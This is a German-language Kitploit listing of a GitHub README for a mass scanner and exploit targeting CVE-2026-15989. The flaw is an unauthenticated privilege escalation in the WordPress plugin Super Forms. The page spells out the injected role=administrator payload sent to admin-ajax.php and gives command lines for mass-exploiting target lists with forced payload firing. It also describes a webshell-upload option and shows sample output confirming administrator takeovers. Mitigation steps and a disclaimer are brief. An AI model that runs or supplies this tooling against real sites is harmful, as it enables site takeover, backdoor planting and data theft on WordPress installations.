Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-15989 — Massenscanner und Exploit für CVE-2026-15989, die unauthentifizierte Rechteausweitung in Super Forms <= 6.3.316, die über den role-Parameter Administrator-Konten erstellt. | Kitploit
Tools/GitHubGitHub/fl0ydsec/cve-2026-15989
Privilege EscalationSchwachstellenscannerPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstests
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

Massenscanner und Exploit für CVE-2026-15989, die unauthentifizierte Rechteausweitung in Super Forms <= 6.3.316, die über den role-Parameter Administrator-Konten erstellt.

4vor 6h 51mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2026-15989 — Super Forms ≤ 6.3.316 — Unauthentifizierte Privilegieneskalation PoC

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — unauthentifizierte Privilegieneskalation über den role-Parameter des Premium-Register & Login-Add-ons.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 Schwachstellenübersicht

AttributDetails
CVE-IDCVE-2026-15989
KetteRegistrierungsformular → 'role' in $other_userdata → wp_insert_user(role=administrator) → ADMIN
Schweregrad🔴 KRITISCH (CVSS 9.8)
ZielSuper Forms – Drag & Drop Form Builder + Premium-Register & Login-Add-on
Betroffen≤ 6.3.316 (Core) — verwundbare Add-on-Builds (v1.x)
Behoben6.3.317
Erforderliche AuthentifizierungKeine

🔍 Technische Beschreibung

Das Add-on setzt die Rolle des neuen Benutzers aus den Formulareinstellungen ($userdata['role'] = $settings['register_user_role']) und iteriert dann über $other_userdata — welches 'role' enthält — und überschreibt jeden Schlüssel mit dem vom Client gelieferten Wert ($data['role']['value']), bevor wp_insert_user() aufgerufen wird.

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

Fix (6.3.317): 'role' aus der Whitelist entfernt + get_safe_public_registration_role() (fail-closed).

Ursprüngliche Forschung — Dual-Submit-Protokoll: Der Core änderte die Protokolle mit v5.0.0.

CoreAktionDatenformatNonce
4.xsuper_send_emailverschachtelte Felder (data[role][value]=...)keine (Prüfungen auskommentiert)
5.x/6.xsuper_submit_formJSON-Stringsf_nonce via super_create_nonce

Das Tool wählt das Protokoll automatisch anhand der erkannten Version.


🚀 Verwendung

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
OptionBeschreibung
--list FILEEin Ziel pro Zeile; URL|form_id oder URL|form_id=ID,email=X pro Zeile
-u/--target, --portEinzelnes Ziel
--threads, --timeout, --no-dedupOptimierung des Massenmodus
--forcePayload abfeuern, auch ohne erkanntes Registrierungsformular
--only-hits / --quietBäume nur für bestätigte Treffer / minimale Ausgabe
--resetVerify-Modus-Abschluss über Lost-Password (Operator fügt den Reset-Link ein)
--only-loginRegistrierung überspringen; einloggen und Rolle über users/me prüfen
--login / --rcePost-Exploitation am echten Ziel: Login-Nachweis / Webshell-Plugin-Upload
-k/--insecureTLS ignorieren

📊 Ausgabe

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — nur bestätigte Ziele (ts|url|status|detail, mit Benutzer/Passwort)
  • Fortschrittsbalken mit ETA + Zähler pro Status; jede Phase gibt bei Fehlschlag den tatsächlichen Grund aus (WAF, Absturz, Login-only-Formular, falsches Protokoll...)

⚙️ Funktionen

  • Duales Protokoll (4.x verschachtelte Daten / 5+ JSON+Nonce) — automatisch nach Version ausgewählt
  • Versionserkennung: readme.txt Stable-Tag + common.js?ver=; Add-on-Probe + dessen eigene Version
  • Erkennung von Registrierungsformularen: gängige Pfade + sitemap.xml/wp-sitemap.xml/sitemap_index + Home-Links
  • Automatisches Ausfüllen erforderlicher Felder (inkl. versteckter/bedingter)
  • "already exists" → direkter Login-Nachweis des bestehenden Kontos
  • Absturzkontrolle: erneutes Senden des Formulars ohne die injizierte Rolle, um serverseitige Probleme von injektionsbedingten Abstürzen zu unterscheiden
  • Verbindlicher Admin-Nachweis über /wp-json/wp/v2/users/me?context=edit (Fallback: users.php / Dashboard)

📁 Dateistruktur

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ Haftungsausschluss

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Gegenmaßnahmen

  1. Super Forms auf 6.3.317 (oder neuer) aktualisieren und alle geleakten Zugangsdaten rotieren
  2. Das Register & Login-Add-on aktuell halten (es hat einen eigenen Versionszyklus)
  3. Veröffentlichte Registrierungsformulare entfernen/deaktivieren, wenn sie nicht benötigt werden
  4. wp-admin/-Benutzer auf unerwartete Administrator-Konten prüfen

👤 Autor

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Tool herunterladen